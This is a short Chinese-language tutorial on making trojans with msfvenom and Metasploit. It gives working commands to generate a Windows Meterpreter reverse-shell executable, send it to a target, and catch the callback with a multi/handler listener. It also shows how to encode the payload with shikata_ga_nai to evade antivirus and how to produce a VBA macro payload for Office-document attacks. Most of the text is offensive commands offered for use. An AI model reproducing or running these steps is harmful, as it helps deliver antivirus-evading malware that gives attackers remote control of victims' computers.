當我們需要往目標機上傳木馬文件時,我們就可以利用msfvenom生成一個木馬文件,並用metersploit進行監聽,就能夠反彈回shell。
我們制作的木馬文件有沒有免殺功能,可以在virscan中進行掃描檢測一下。
https://www.virscan.org/
或者在本地用一些殺毒軟件進行檢測。
常規利用
1. 生成windows木馬程序。
生成一個windows的木馬應用程序:back.exe,並反彈shell至192.168.91.132:8836端口。我們可以利用metersploit進行監聽
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.132 LPORT=8836 -f exe -o back.exe
-p 是payload,就是控制目標主機以后,要讓他干什么。具體的命令就是payload.
-f 是生成的后門的格式。
-o 是輸出文件名
2. 將木馬程序發送給目標機。
3. 在自己的kali中開啟metersploit。
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.91.132 #這里的IP地址就是我們木馬文件中要反彈的IP地址
set LPORT 8836
run
4. 目標機點擊了back.exe。
當目標機運行了木馬程序時,我們msf這邊就上線了,一般這種的會被殺毒軟件發現,要想不被發現,就要制作免殺木馬程序。
制作免殺木馬
msfvenom -l encoders #查看有哪些編碼格式。
-e x86/shikata_ga_nai 對木馬編碼進行免殺
-i 5 指定編碼5次,這個次數可以隨便修改。
-b '\x00' 指定一些壞字節。
office宏攻擊的payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip地址 LPORT=端口 -f vba -o nouyan.vba
-f vba 是生成vba宏語言的payload.